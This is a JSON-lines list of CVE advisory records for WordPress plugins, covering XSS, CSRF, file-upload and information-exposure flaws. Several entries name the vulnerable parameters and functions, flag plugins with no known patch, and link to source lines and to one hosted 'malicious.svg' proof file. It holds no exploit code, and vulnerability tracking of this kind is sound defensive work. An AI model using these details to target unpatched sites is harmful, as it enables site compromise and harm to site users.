{"CVE_ID":"CVE-2024-12709","slug":"bulk-me-now","versionImpact":"2.0","description":"The Bulk Me Now! WordPress plugin through 2.0 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d93056f1-1a6e-405f-a094-d4d270393f87\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2482","slug":"gotcha-gesture-based-captcha","versionImpact":"1.0.0","description":"The Gotcha | Gesture-based Captcha plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'menu' parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gotcha-gesture-based-captcha\\\/trunk\\\/admin\\\/libs\\\/setting.php#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gotcha-gesture-based-captcha\\\/trunk\\\/admin\\\/libs\\\/setting.php#L223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gotcha-gesture-based-captcha\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gotcha-gesture-based-captcha\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e7f1fe6-0a23-48e1-a75f-f8c1c8d4f8e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e7f1fe6-0a23-48e1-a75f-f8c1c8d4f8e0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9544","slug":"mapsvg","versionImpact":"8.6.4","description":"The MapSVG plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 8.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/simplepx.com\\\/newfloward\\\/wp-content\\\/uploads\\\/mapsvg\\\/malicious.svg\",\"name\":\"https:\\\/\\\/simplepx.com\\\/newfloward\\\/wp-content\\\/uploads\\\/mapsvg\\\/malicious.svg\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec77f96-c73a-44f7-afa2-673f68ee3582?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec77f96-c73a-44f7-afa2-673f68ee3582?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5831","slug":"droip","versionImpact":"2.2.0","description":"The Droip plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the make_google_font_offline() function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/droip.com\\\/\",\"name\":\"https:\\\/\\\/droip.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd129829-9682-4def-a07f-66f9178eeb77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd129829-9682-4def-a07f-66f9178eeb77?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2933","slug":"0mk-shortener","versionImpact":"0.2","description":"The 0mk Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.2. This is due to missing or incorrect nonce validation on the zeromk_options_page function. This makes it possible for unauthenticated attackers to inject malicious web scripts via the 'zeromk_user' and 'zeromk_apikluc' parameters through a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/0mk-shortener\\\/trunk\\\/0mk.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/0mk-shortener\\\/trunk\\\/0mk.php#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b798c64-3434-427d-b578-5abbdac8cd0e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b798c64-3434-427d-b578-5abbdac8cd0e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-38356","slug":"pearl-header-builder","versionImpact":"1.3.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in StylemixThemes WordPress Header Builder Plugin \u2013 Pearl plugin <=\u00a01.3.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pearl-header-builder\\\/wordpress-pearl-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/pearl-header-builder\\\/wordpress-pearl-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0708","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_first_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7549db-9a4b-4dee-8023-d7863dc3b4c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae7549db-9a4b-4dee-8023-d7863dc3b4c8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5531","slug":"wp-responsive-slider-with-lightbox","versionImpact":"1.0","description":"The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the delete functionality. This makes it possible for unauthenticated attackers to delete image lightboxes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/055b7ed5-268a-485e-ac7d-8082dc9fb2ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/055b7ed5-268a-485e-ac7d-8082dc9fb2ad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1263536%40wp-responsive-slider-with-lightbox&new=1263536%40wp-responsive-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-slider-with-lightbox\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1472","slug":"wp-maintenance","versionImpact":"6.1.6","description":"The WP Maintenance plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.1.6 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's maintenance mode and obtain post and page content via the REST API.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0827","slug":"play-ht","versionImpact":"3.6.4","description":"The Play.ht \u2013 Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.4. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de112e5a-4b92-4389-8c6e-b2bfeb6f6cd4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5006","slug":"boostify-header-footer-builder","versionImpact":"1.3.2","description":"The Boostify Header Footer Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018size\u2019 parameter in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c2a5d4-f201-4cc8-ac49-cde1160ca468?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c2a5d4-f201-4cc8-ac49-cde1160ca468?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu.php#L525\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu.php#L525\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu-vertical.php#L393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/boostify-header-footer-builder\\\/trunk\\\/inc\\\/elementor\\\/widgets\\\/class-mega-menu-vertical.php#L393\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097085\\\/#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097085\\\/#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boostify-header-footer-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/boostify-header-footer-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4755","slug":"google-cse","versionImpact":"1.0.7","description":"The Google CSE WordPress plugin through 1.0.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7649","slug":"opal-membership","versionImpact":"1.2.4","description":"The Opal Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via checkout form fields in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed2bb3e2-5002-4746-a4f8-b5d1752ccbbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed2bb3e2-5002-4746-a4f8-b5d1752ccbbf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-checkout.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-membership\\\/trunk\\\/inc\\\/class-opalmembership-checkout.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8967","slug":"iworks-pwa","versionImpact":"1.6.3","description":"The PWA \u2014 easy way to Progressive Web App plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/000bf956-1781-4596-ac12-81691fdd789c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/000bf956-1781-4596-ac12-81691fdd789c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/iworks-pwa\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/iworks-pwa\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iworks-pwa\\\/trunk\\\/includes\\\/iworks\\\/class-iworks-svg.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iworks-pwa\\\/trunk\\\/includes\\\/iworks\\\/class-iworks-svg.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161056\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161056\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10895","slug":"wp-counter-up","versionImpact":"2.4.0","description":"The Counter Up \u2013 Animated Number Counter & Milestone Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lgx-counter' shortcode in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-counter-up\\\/trunk\\\/public\\\/class-wp-counter-up-public.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-counter-up\\\/trunk\\\/public\\\/class-wp-counter-up-public.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e070de-bd77-48a4-a9c2-3938b144398a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36e070de-bd77-48a4-a9c2-3938b144398a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12708","slug":"bulk-me-now","versionImpact":"2.0","description":"The Bulk Me Now! WordPress plugin through 2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8f30a37e-b9d0-467b-a0e3-20dc0a9f2b61\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0370","slug":"shortcodes-ultimate","versionImpact":"7.3.3","description":"The WP Shortcodes Plugin \u2014 Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018src\u2019 parameter in all versions up to, and including, 7.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcodes-ultimate\\\/trunk\\\/includes\\\/shortcodes\\\/lightbox.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229060\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229060\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcodes-ultimate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/shortcodes-ultimate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0869c35-9ea8-46a5-8bba-23d7ef47355a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f0869c35-9ea8-46a5-8bba-23d7ef47355a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2479","slug":"easy-custom-admin-bar","versionImpact":"1.0","description":"The Easy Custom Admin Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018msg\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-custom-admin-bar\\\/trunk\\\/adminbar.php#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-custom-admin-bar\\\/trunk\\\/adminbar.php#L198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-custom-admin-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-custom-admin-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140f633c-c2e4-4b3c-befc-d870e06be970?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/140f633c-c2e4-4b3c-befc-d870e06be970?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6550","slug":"the-pack-addon","versionImpact":"2.1.3","description":"The The Pack Elementor addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018slider_options\u2019 parameter in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/carousel_parallax\\\/view.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/carousel_parallax\\\/view.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_1\\\/view.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_1\\\/view.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_4\\\/view.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/imgbox_4\\\/view.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/sliderparallax\\\/view.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/sliderparallax\\\/view.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_1\\\/one.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_1\\\/one.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_5\\\/one.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-pack-addon\\\/trunk\\\/includes\\\/widgets\\\/element\\\/testimonial_5\\\/one.php#L33\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af2f136-5806-4d5e-a72d-486c4839a695?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af2f136-5806-4d5e-a72d-486c4839a695?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7022","slug":"my-reservation-system","versionImpact":"2.3","description":"The My Reservation System WordPress plugin through 2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1021763-075b-40c7-801d-b5519828aabe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0728","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder function. This makes it possible for unauthenticated attackers to invoke this function via a forged request granted they can trick a site administrator into performing an action such as clicking on a link, leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43b43802-f301-4748-98b9-eea78a249355\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43b43802-f301-4748-98b9-eea78a249355\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
